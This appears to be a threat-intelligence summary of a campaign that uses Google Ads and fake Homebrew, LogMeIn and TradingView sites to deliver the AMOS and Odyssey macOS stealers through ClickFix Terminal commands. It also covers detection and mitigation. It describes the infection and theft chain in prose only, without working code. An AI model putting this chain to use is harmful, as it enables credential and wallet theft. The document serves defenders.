Full Report
A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. [...]
Analysis Summary
# Tool/Technique: AMOS (Atomic macOS Stealer) & Odyssey Stealer
## Overview
A malware campaign leveraging malvertising (Google Ads) to trick macOS users into installing information-stealing malware, specifically AMOS and Odyssey. Threat actors impersonate legitimate services like Homebrew, LogMeIn, and TradingView. The infection relies on a "ClickFix" technique where users are persuaded to execute malicious commands in the Terminal.
## Technical Details
- Type: Malware family (AMOS, Odyssey) | Technique (ClickFix/Malvertising)
- Platform: macOS
- Capabilities: Information theft, credential harvesting, backdoor addition (AMOS), remote access capabilities.
- First Seen: AMOS first documented in April 2023. Odyssey documented in Summer 2025 (derived from Poseidon Stealer/AMOS).
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1588.002 - Obtain Capabilities: Develop Capabilities (Malware as a Service model, AMOS)
- T1566.002 - Phishing: Spearphishing Link (Via malicious ads leading to fake sites)
- TA0002 - Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- TA0003 - Privilege Escalation
- T1548.003 - Abuse Elevation Control Mechanism: Bypass User Account Control (Invoking `sudo`)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Information Gathering:** Collects detailed hardware and memory information upon execution.
- **Execution Chain:** Fetches and decodes an `install.sh` script, downloads a payload binary, removes quarantine flags, and bypasses Gatekeeper prompts.
- **Persistence/Evasion:** Checks for a virtual machine or analysis system environment before execution. Explicitly uses `sudo` to gain root privileges.
- **System Manipulation:** Kills legitimate processes like OneDrive updater daemons and interacts with macOS XPC services to blend in.
- **Data Theft:** Hartests browser credentials (Chrome, Firefox, Safari), cryptocurrency wallet credentials (over 100 extensions), Keychain data, and personal files.
- **Exfiltration:** Zips the stolen data and sends it to the C2 server.
### Advanced Features
- **AMOS Specific:** Functions as Malware-as-a-Service (MaaS), recently updated with a backdoor component for persistent remote access.
- **Odyssey Specific:** Derived from Poseidon Stealer (which was forked from AMOS). Targets credentials and cookies.
- **ClickFix Delivery:** Uses malicious Google Ads promoting fake download sites (Homebrew, LogMeIn, TradingView) serving clipboard commands that execute installation directly upon user interaction.
- **Base64 Encoding:** On fake TradingView sites, a displayed command differs from the copied command, which is base64-encoded for obfuscation.
## Indicators of Compromise
- File Hashes: [Not explicitly available in the text]
- File Names: `install.sh` (staged file)
- Registry Keys: [Not applicable for macOS primary focus]
- Network Indicators: C2 servers/domains used for exfiltration (Not explicitly detailed or defanged in the text, but implied through C2 communication).
- Behavioral Indicators: Execution of shell commands via copy/paste in Terminal; invocation of `sudo`; checking for VM environment; termination of OneDrive updater daemons; interaction with macOS XPC services.
## Associated Threat Actors
- The threat actors utilizing AMOS (which operates as a MaaS platform).
- The specific group orchestrating this malvertising campaign (Identified by Hunt.io).
## Detection Methods
- Signature-based detection: (For known AMOS/Odyssey binaries)
- Behavioral detection: Monitoring for dynamic execution from clipboard/shell commands; unauthorized use of `sudo`; attempts to harvest credentials from specific browser/wallet directories; termination of known system services.
- YARA rules: [Not available in the text]
## Mitigation Strategies
- **User Education:** Strongly advise users against pasting commands directly into the Terminal from untrusted sources (especially search engine ads).
- **Security Best Practices:** Do not trust software obtained through general paid search advertisements. Verify official download sources.
- **System Hardening:** Implement strong endpoint monitoring for runtime process creation stemming from script execution, especially those involving `sudo`.
## Related Tools/Techniques
- Poseidon Stealer (Precursor/Ancestor to Odyssey Stealer)
- Malvertising/ClickFix Techniques (Initial Access vectors)
- Homebrew (Impersonated platform)
- LogMeIn (Impersonated platform)
- TradingView (Impersonated platform)